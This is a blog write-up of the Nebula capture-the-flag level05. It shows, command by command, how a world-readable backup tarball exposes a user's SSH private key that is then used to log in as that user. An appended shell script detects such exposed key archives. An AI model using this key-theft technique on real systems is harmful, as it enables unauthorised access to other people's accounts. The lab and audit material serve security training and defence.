Wednesday, August 8, 2012

nebula level05

The level details (at http://exploit-exercises.com/nebula/level05) say:
Check the flag05 home directory. You are looking for weak directory permissions
Next we check the aforementioned directory:
level05@nebula:~$ ls -la /home/flag05
total 36
drwxr-x---  5 flag05 level05 4096 2012-08-08 01:59 .
drwxr-xr-x 43 root   root    4096 2011-11-20 20:21 ..
drwxr-xr-x  2 flag05 flag05  4096 2011-11-20 20:13 .backup
-rw-------  1 flag05 flag05    20 2012-08-08 01:59 .bash_history
-rw-r--r--  1 flag05 flag05   220 2011-05-18 02:54 .bash_logout
-rw-r--r--  1 flag05 flag05  3353 2011-05-18 02:54 .bashrc
drwx------  2 flag05 flag05  4096 2012-08-08 01:59 .cache
-rw-r--r--  1 flag05 flag05   675 2011-05-18 02:54 .profile
drwx------  2 flag05 flag05  4096 2011-11-20 20:13 .ssh
We notice the .ssh directory, which indicates that flag05 uses ssh, and the .backup directory, which we can examine:
level05@nebula:~$ ls -la /home/flag05/.backup
total 12
drwxr-xr-x 2 flag05 flag05  4096 2011-11-20 20:13 .
drwxr-x--- 5 flag05 level05 4096 2012-08-08 01:59 ..
-rw-rw-r-- 1 flag05 flag05  1826 2011-11-20 20:13 backup-19072011.tgz
Let's copy that backup tarball over and check it out.
level05@nebula:~$ cp /home/flag05/.backup/backup-19072011.tgz .
level05@nebula:~$ tar xvf backup-19072011.tgz
.ssh/
.ssh/id_rsa.pub
.ssh/id_rsa
.ssh/authorized_keys
Whoa... It just dropped its ssh private key (.ssh/id_rsa) in our home directory. And the presence of .ssh/id_rsa.pub indicates that it is (or used to be) in flag05's home directory as well. If it still is and corresponds to the same private key, we might be able to log in through ssh without a password. This is known as password-less login, and it's useful in some cases. The security is compromised if your id_rsa gets stolen and it doesn't require a passphrase, though. Let's try to ssh as flag05; hopefully it won't require a passphrase:
level05@nebula:~$ ssh flag05@nebula

      _   __     __          __
     / | / /__  / /_  __  __/ /___ _
    /  |/ / _ \/ __ \/ / / / / __ `/
   / /|  /  __/ /_/ / /_/ / / /_/ /
  /_/ |_/\___/_.___/\__,_/_/\__,_/

    exploit-exercises.com/nebula


For level descriptions, please see the above URL.

To log in, use the username of "levelXX" and password "levelXX", where
XX is the level number.

Currently there are 20 levels (00 - 19).


Welcome to Ubuntu 11.10 (GNU/Linux 3.0.0-12-generic i686)

 * Documentation:  https://help.ubuntu.com/
New release '12.04 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Wed Aug  8 01:59:32 2012 from localhost
flag05@nebula:~$
We're in! Time for another flag...
flag05@nebula:~$ getflag
You have successfully executed getflag on a target account
Nice and easy (given the right knowledge :)

~ Dmitry
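
From the defender's side, the weakness above is a tarball with other-read permission (-rw-rw-r--) that holds a private key. The following audit is an added example, not part of the original post; the function names, the sample tree and the list of key file names (OpenSSH defaults) are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: report tar archives that any local user can read and that
# contain SSH private key files (default OpenSSH key names assumed).

# Print the path of every other-readable tar archive under $1 that has a
# member named like a default OpenSSH private key.
audit_key_archives() {
    find "$1" -type f \( -name '*.tgz' -o -name '*.tar.gz' -o -name '*.tar' \) \
        -perm -004 2>/dev/null |
    while IFS= read -r archive; do
        # tar -tf lists member names only; nothing is extracted.
        if tar -tf "$archive" 2>/dev/null |
           grep -Eq '(^|/)id_(rsa|dsa|ecdsa|ed25519)$'; then
            printf '%s\n' "$archive"
        fi
    done
}

# Build a constructed sample tree: one archive with the modes seen in the
# post (0664) and one locked down (0600). The "key" is a dummy string.
make_sample_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/stage/.ssh" "$root/home/.backup" "$root/home/private"
    echo 'constructed placeholder, not a key' > "$root/stage/.ssh/id_rsa"
    echo 'constructed placeholder' > "$root/stage/.ssh/id_rsa.pub"
    tar -czf "$root/home/.backup/backup-sample.tgz" -C "$root/stage" .ssh
    cp "$root/home/.backup/backup-sample.tgz" "$root/home/private/locked.tgz"
    chmod 664 "$root/home/.backup/backup-sample.tgz"
    chmod 600 "$root/home/private/locked.tgz"
    printf '%s\n' "$root"
}

# Demo run: only the 0664 archive is reported.
root=$(make_sample_tree)
audit_key_archives "$root/home"
rm -rf "$root"
```

Run it against /home as root so that every home directory can be traversed; any path it prints should be tightened to mode 600 and the key inside treated as exposed.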
